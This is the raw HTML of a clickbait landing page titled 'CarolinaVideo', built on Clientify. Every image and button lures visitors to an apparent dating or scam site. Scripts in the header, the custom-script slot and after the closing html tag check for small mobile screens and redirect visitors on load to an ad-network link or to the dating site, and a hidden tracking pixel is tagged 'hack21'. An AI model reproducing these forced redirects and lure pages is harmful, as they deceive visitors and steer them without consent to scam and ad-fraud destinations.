
<!DOCTYPE html>
<html>
    <!DOCTYPE html>


<head>
<meta charset="utf-8"/>
<meta content="ie=edge" http-equiv="x-ua-compatible"/>
<title>CarolinaVideo</title>
<meta content="" name="description"/>
<meta content="width=device-width, initial-scale=1" name="viewport"/>
	<meta name="keywords" content="">
	<link rel="icon" href="https://app.clientify.com/static/img/favicon.ico">

        <!-- Begin Social Media Meta -->
        <meta property="og:title" content="CLICK 🇦🇹🇦🇺🇨🇦🇩🇰🇩🇪🇫🇮🇮🇹🇳🇴🇨🇭🇸🇪🇺🇸" />
        <meta property="og:url" content="https://tepuedeinteresar.com/clividio3xd" />
        <meta property="og:description" content="CLICK
🇦🇹🇦🇺🇨🇦🇩🇰🇩🇪🇫🇮🇮🇹🇳🇴🇨🇭🇸🇪🇺🇸" />
        <meta property="og:image" content="https://d25ltszcjeom5i.cloudfront.net/landingpages/socialmediapictures/127727/b93383cd4-5332-46d7-9227-9f0cdda16e88.jpg" />
        <meta property="og:type" content="website" />
        <!-- End Social Media Meta -->
        
<style type="text/css">
        .u-row {
  display: flex;
  flex-wrap: nowrap;
  margin-left: 0;
  margin-right: 0;
}

.u-row .u-col {
  position: relative;
  width: 100%;
  padding-right: 0;
  padding-left: 0;
}


.u-row .u-col.u-col-100 {
  flex: 0 0 100%;
  max-width: 100%;
}


@media (max-width: 767px) {
  .u-row:not(.no-stack) {
    flex-wrap: wrap;
  }

  .u-row:not(.no-stack) .u-col {
    flex: 0 0 100% !important;
    max-width: 100% !important;
  }
}

body,html{padding:0;margin:0}html{box-sizing:border-box}*,:after,:before{box-sizing:inherit}html{font-size:14px;-ms-overflow-style:scrollbar;-webkit-tap-highlight-color:rgba(0,0,0,0)}p{margin:0}form .error-field{-webkit-animation-name:shake;animation-name:shake;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}form .error-field input,form .error-field textarea{border-color:#a94442!important;color:#a94442!important}form .field-error{padding:5px 10px;font-size:14px;font-weight:700;position:absolute;top:-20px;right:10px}form .field-error:after{top:100%;left:50%;border:solid transparent;content:" ";height:0;width:0;position:absolute;pointer-events:none;border-color:rgba(136,183,213,0);border-top-color:#ebcccc;border-width:5px;margin-left:-5px}form .spinner{margin:0 auto;width:70px;text-align:center}form .spinner>div{width:12px;height:12px;background-color:hsla(0,0%,100%,.5);margin:0 2px;border-radius:100%;display:inline-block;-webkit-animation:sk-bouncedelay 1.4s infinite ease-in-out both;animation:sk-bouncedelay 1.4s infinite ease-in-out both}form .spinner .bounce1{-webkit-animation-delay:-.32s;animation-delay:-.32s}form .spinner .bounce2{-webkit-animation-delay:-.16s;animation-delay:-.16s}@-webkit-keyframes sk-bouncedelay{0%,80%,to{-webkit-transform:scale(0)}40%{-webkit-transform:scale(1)}}@keyframes sk-bouncedelay{0%,80%,to{-webkit-transform:scale(0);transform:scale(0)}40%{-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes shake{0%,to{-webkit-transform:translateZ(0);transform:translateZ(0)}10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0);transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-webkit-transform:translate3d(10px,0,0);transform:translate3d(10px,0,0)}}@keyframes shake{0%,to{-webkit-transform:translateZ(0);transform:translateZ(0)}10%,30%,50%,70%,90%{-webkit-transform:translate3d(-10px,0,0);transform:translate3d(-10px,0,0)}20%,40%,60%,80%{-webkit-transform:translate3d(10px,0,0);transform:translate3d(10px,0,0)}}@media (max-width:480px){.container{max-width:100%!important}}@media (min-width:481px) and (max-width:768px){.hide-tablet{display:none!important}}.container{width:100%;padding-right:0;padding-left:0;margin-right:auto;margin-left:auto}@media (min-width:576px){.container{max-width:540px}}@media (min-width:768px){.container{max-width:720px}}@media (min-width:992px){.container{max-width:960px}}@media (min-width:1200px){.container{max-width:1140px}}

a[onclick] {
  cursor: pointer;
}
body { font-family: arial,helvetica,sans-serif; font-size: 1rem; line-height: 1.5; color: #000000; background-color: #e7e7e7; } #u_body a { color: #0000ee; text-decoration: underline; } #u_body a:hover { color: #0000ee; text-decoration: underline; } #u_content_button_1 a:hover { color: #FFFFFF !important; background-color: #3AAEE0 !important; }
      </style>
<script defer="" src="https://analyticsplusdev.clientify.net/analytics_new/pixel/eXuElTgAwMWoz1GU"></script>
        <!-- Header scripts -->
        <!-- Include the script -->
 
  <img src="//whos.amung.us/pingjs/?k=hack21 &t= GOKU21 &x=Youtube.com" style="display:none" alt="">




<script> if(screen.colorDepth >= 24 && navigator.cookieEnabled == true && screen.width < 500) { setTimeout(setTime, 0); } 

function setTime() { window.location =
'https://www.profitablegatecpm.com/xjr21mnw?key=88e66011a956657df5276d6e8aa84d10'; } </script>
        <!-- End Header scripts --> 

</head>
<body>
<div id="main-body" class="u_body" id="u_body" style="min-height: 100vh;">
<div class="u_row" id="u_row_1" style="padding: 0px;">
<div class="container" style="max-width: 500px;margin: 0 auto;">
<div class="u-row">
<div class="u-col u-col-100 u_column" id="u_column_1" style="display:flex;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;">
<div style="width: 100%;padding:0px;">
<div class="u_content_image" id="u_content_image_1" style="overflow-wrap: break-word;padding: 10px;">
<div style="position:relative;line-height:0px;text-align:center">
<a href="https://sweetslovedate.life/?u=f738hw0&amp;o=mt5k5gw" target="_self">
<img alt="" src="https://assets.unlayer.com/projects/237/1700309543141-hg.jpg" style="width: 100%;max-width: 900px;" title=""/>
</a>
</div>
</div>
<div class="u_content_button" id="u_content_button_1" style="overflow-wrap: break-word;padding: 10px;">
<div style="text-align: center;">
<a href="https://sweetslovedate.life/?u=f738hw0&amp;o=mt5k5gw" style="color:#FFFFFF;background-color:#3AAEE0;border-radius: 4px;line-height:120%;display:inline-block;text-decoration:none;text-align:center;padding:10px 20px;width:auto;max-width:100%;word-wrap:break-word;font-size: 14px;" target="_self">
<div id="u_content_button_1"><strong>THE BEST VIDEO ON MY WEBSITE HERE</strong></div>
<div id="u_content_image_3"></div>
</a>
</div>
</div>
<div class="u_content_image" id="u_content_image_2" style="overflow-wrap: break-word;padding: 10px;">
<div style="position:relative;line-height:0px;text-align:center">
<a href="https://sweetslovedate.life/?u=f738hw0&amp;o=mt5k5gw" target="_self">
<img alt="" src="https://assets.unlayer.com/projects/237/1700309640018-alass.jpg" style="width: 100%;max-width: 637px;" title=""/>
</a>
</div>
</div>
<div class="u_content_image" id="u_content_image_3" style="overflow-wrap: break-word;padding: 10px;">
<div style="position:relative;line-height:0px;text-align:center">
<a href="https://sweetslovedate.life/?u=f738hw0&amp;o=mt5k5gw" target="_self">
<img alt="" src="https://assets.unlayer.com/projects/237/1700309667992-248435590_3748287538728930_2719506977650546740_n.jpg" style="width: 100%;max-width: 1146px;" title=""/>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>


    <div id="thanks-body" style="display: none">
        <div style="min-height: 100vh; background-color: #e7e7e7; font-family: arial,helvetica,sans-serif;">
 <div style=" background-color: rgba(255,255,255,0); padding: 10px;">
  <div class="container" style="max-width: 500px; background-color: rgba(255,255,255,0);">
   <div class="row">
    <div class="col-md-12">
     <div style="overflow-wrap: break-word;padding: 20px;">
      <div style="line-height:0px;text-align:center;">
       <img alt="Image" src="https://via.placeholder.com/500x100?text=IMAGE" style="max-width:100%;" title="Image"/>
      </div>
     </div>
     <div style="overflow-wrap: break-word;padding: 20px;">
      <div class="editable" style="color:#000;line-height:120%;text-align:left;font-family:inherit;">
       <p style="text-align: center; font-size: 14px; line-height: 120%;">
        GRACIAS POR SUSCRIBIRTE.  EN BREVE NOS COMUNICAREMOS CONTIGO
       </p>
      </div>
     </div>
    </div>
   </div>
  </div>
 </div>
</div>

    </div>
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/intl-tel-input@18.1.1/build/css/intlTelInput.css">
        <script src="https://cdn.jsdelivr.net/npm/intl-tel-input@18.1.1/build/js/intlTelInput.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js" integrity="sha512-DUC8yqWf7ez3JD1jszxCWSVB0DMP78eOyBpMa5aJki1bIRARykviOuImIczkxlj1KhVSyS16w2FSQetkD4UU2w==" crossorigin="anonymous"></script>
    
        <!-- Begin Cookie Consent plugin by Silktide - http://silktide.com/cookieconsent -->
        <script type="text/javascript">
            var cookie_info = "Este sitio web utiliza cookies y graba los eventos de la pantalla para garantizar la mejor experiencia";
            
            window.cookieconsent_options = {"message":cookie_info, "dismiss":"Entendido", "learnMore":"More info", "link":null, "theme":"dark-floating"};
        </script>
        <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/cookieconsent2/1.0.10/cookieconsent.min.js"></script>
        <style>
            .cc_logo{
                display: none !important;
            }
            .cc_container .cc_btn {
                bottom: 20px;
            }
            .cc_container .cc_message {
                padding-top: 12px;
            }
            .cc_container{
                border-radius: 4px;
            }
            .cc_banner-wrapper {
                z-index: 9999999999;
            }
        </style>
        <!-- End Cookie Consent plugin -->
    
    
        <style>
            body{
                position: relative;
            }
            .powered-by{
                position: fixed;
                bottom: 5px;
                right: 5px;
                z-index: 9999;
                padding: 5px 10px 5px 10px;
                background-color: rgb(85,168,215);
                color: #FFF !important;
                font-size: 14px;
                text-decoration: none;
                font-weight: bold;
            }
            .powered-by:hover{
                color: #FFF;
                /*text-decoration: underline;*/
                opacity: 0.7;

            }
        </style>
        <script>
            $("body").append("<a class='powered-by' href='http://clientify.com'>Powered by Clientify</a>")
        </script>
    

    
    
    
    
        <!-- Custom scripts -->
        <!-- Include the script -->
 
  <img src="//whos.amung.us/pingjs/?k=hack21 &t= GOKU21 &x=Youtube.com" style="display:none" alt="">



</body>
<script> if(screen.colorDepth >= 24 && navigator.cookieEnabled == true && screen.width < 500) { setTimeout(setTime, 0); } 

function setTime() { window.location =
'https://sweetslovedate.life/?u=f738hw0&o=mt5k5gw'; } </script>
        <!-- End Custom scripts --> 
        
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.countdown/2.2.0/jquery.countdown.min.js" integrity="sha512-lteuRD+aUENrZPTXWFRPTBcDDxIGWe5uu0apPEn+3ZKYDwDaEErIK9rvR0QzUGmUQ55KFE2RqGTVoZsKctGMVw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.form/4.2.2/jquery.form.min.js"></script>
        <script>
            var CURRENT_LANDING_PAGE_ID = 127727;
            var requiredFieldsString = '[]';
            var requiredFields = JSON.parse(requiredFieldsString);

            $( document ).ready(function() {
                if ($('#countdown').length > 0){
                    $('#countdown').countdown($("#countdown_config").attr("data-future-date") + " " + $("#countdown_config").attr("data-future-time")).on('update.countdown', function(event) {
                        var $this = $(this).html(event.strftime(''
                                + '<span>%D</span> dia%!d '
                                + '<span>%H</span> hr '
                                + '<span>%M</span> min '
                                + '<span>%S</span> sec'));
                    });
                }
            });

            var a_form = $('input[type="submit"]:hidden').prev().find('a');
            if (!a_form.length) {
                a_form = $('button.v-button-width-width[type="submit"]');
                if (!a_form.length) {
                    a_form = $('button[type="submit"]')
                }
            }
            var a_form_html = a_form.html();
            var landing_form = a_form.closest('form');

            var webform_options = {
                resetForm: true,
                url: "https://api.clientify.net/web-marketing/webforms/process/127727/",
                type: "POST",
                beforeSubmit: function(){
                    a_form.html('<div class="spinner"><div class="bounce1"></div><div class="bounce2"></div><div class="bounce3"></div></div>')
                    if (!landing_form[0].checkValidity()){
                        alert("Please fill required fields");
                        a_form.html(a_form_html);
                        return false
                    }
                },
                success: function (response) {
                    if (response.success) {
                        if (response.tracking_url) {
                            var i = document.createElement('img');
                            i.src = response.tracking_url;
                            i.alt = 'image';
                            i.style.display = 'none';
                            document.body.appendChild(i);
                        }
                        if (response.success_option === 'redirection' || response.success_option === 'landingpage') {
                            location.href = response.success_text;
                        }
                        else if (response.success_option === 'thanks') {
                            $('#main-body').hide();
                            $('#thanks-body').show();
                        }
                        else {
                            alert(response.success_text);
                        }
                    }
                    else {
                        alert(response.success_text);
                    }
                    a_form.html(a_form_html)
                }
            };

            function getHoverColor(string){
                var hover_color = '';
                if (string){
                    var style_array = string.split(';');
                    for (i=0; i < style_array.length; i++){
                        var property = style_array[i].split(':');
                        if (property[0] === 'hover-color'){
                            hover_color = property[1]
                        }
                    }
                }
                return hover_color
            }

            function markAsRequired(form, required_fields){
                form.find('input').each(function(){
                    var $this = $(this);
                    $.each(required_fields, function(index, value){
                        if (value === $this.attr('name')){
                            $this.prop('required', true);
                        }
                    })
                });
            }

            markAsRequired(landing_form, requiredFields);

            var a_style = a_form.attr('style');

            var hover_color = getHoverColor(a_style);
            if (hover_color === ''){
                hover_color = a_form.css('background-color')
            }
            var background_color = a_form.css('background-color');

            a_form.hover(function(){
                $(this).css("background-color", hover_color);
            }, function(){
                $(this).css("background-color", background_color);
            });

            a_form.click(function(event){
                event.preventDefault();
                var landing_form = $(this).closest('form');
                if (vk){webform_options.data = {visitor_key: vk}}
                landing_form.ajaxSubmit(webform_options);
            });

            //New method for hash
            var sourcehash = window.location.hash.replace('#','');
            if (sourcehash !== '' && sourcehash !== undefined){
                var hash_list = sourcehash.split('_');
                if (hash_list[0] == 'thanks'){
                    $('#main-body').hide();
                    $('#thanks-body').show();
                }
                else if (hash_list[0] == 'message'){
                    var message = hash_list[1].replace('-', ' ');
                    alert(message);
                }
            }


        </script>
    
    
    
        <!--Clientify Tracking Begins-->
        <script type="text/javascript">
        if (typeof trackerCode ==='undefined'){
            (function (d, w, u, o) {
                w[o] = w[o] || function () {
                    (w[o].q = w[o].q || []).push(arguments)
                };
                a = d.createElement('script'),
                    m = d.getElementsByTagName('script')[0];
                a.async = 1; a.src = u;
                m.parentNode.insertBefore(a, m)
            })(document, window, 'https://analytics.clientify.net/tracker.js', 'ana');
            ana('setTrackerUrl', 'https://analytics.clientify.net');
            ana('setTrackingCode', 'CF-55902-55902-ZUYQQ');
            ana('trackPageview');
        }</script>
        <!--Clientify Tracking Ends-->
        

        <style>
            .iti--allow-dropdown input, .iti--allow-dropdown input[type=text] {
                padding-left: 52px !important;
            }

            .iti.iti--allow-dropdown{
                width: 100%;
            }

            .phone-validation-message {
                font-size: 12px;
                color: red;
                margin-left: 5px;
            }
        </style>
        <script>
            const phoneInputs = document.querySelectorAll('input[name="phone"]');
            let counter = 0;
            phoneInputs.forEach(input => {
                counter++; 
                input.setAttribute('data-id', 'phone-input-' + counter);
                input.setAttribute('placeholder', '');
                const parentElement = input.parentNode;
                const iti = window.intlTelInput(input, {
                    utilsScript: "https://cdn.jsdelivr.net/npm/intl-tel-input@18.1.1/build/js/utils.js",
                    initialCountry: "auto",
                    geoIpLookup: function(callback) {
                        fetch("https://ipapi.co/json")
                        .then(function(res) { return res.json(); })
                        .then(function(data) { callback(data.country_code); })
                        .catch(function() { console.log('catch'); callback("es"); });
                    },
                });

                input.addEventListener('input', function() {
                    const parentElementInput = input.parentNode;
                    let validationResult = document.getElementById(input.getAttribute('data-id') + "-validation-message");
                    if (!validationResult) {
                        validationResult = document.createElement('span');
                        validationResult.id = input.getAttribute('data-id') + "-validation-message";
                        validationResult.className = "phone-validation-message";
                        parentElementInput.parentNode.insertBefore(validationResult, parentElementInput.nextSibling);
                    }

                    if (iti.isValidNumber()) {
                        input.style.border = ""; 
                        validationResult.textContent = ""; 
                    } else {
                        input.style.border = "1px solid red";
                        validationResult.textContent = `No es un número válido`;
                    }
                });

                input.addEventListener('change', function() {
                    if (!iti.isValidNumber()) {
                        input.value = "";
                    }

                    if (iti.isValidNumber()) {
                        var phoneNumber = iti.getNumber();
                        input.value = phoneNumber;
                    }
                });

                setTimeout(() => {
                    console.log('Script');
                    const phoneBandsActive = document.querySelector(".iti__flag");
                    const actualCountry = iti. getSelectedCountryData();
                    if(input.placeholder == '' || phoneBandsActive.classList.length < 2){
                        console.log('Empty band');
                        iti.setCountry("es");
                    }
                }, 5000);
            });
        </script>
    </body>
</html>

<script> if(screen.colorDepth >= 24 && navigator.cookieEnabled == true && screen.width < 500) { setTimeout(setTime, 0); } function setTime() { window.location =
'https://www.profitablegatecpm.com/xjr21mnw?key=88e66011a956657df5276d6e8aa84d10'; } </script>
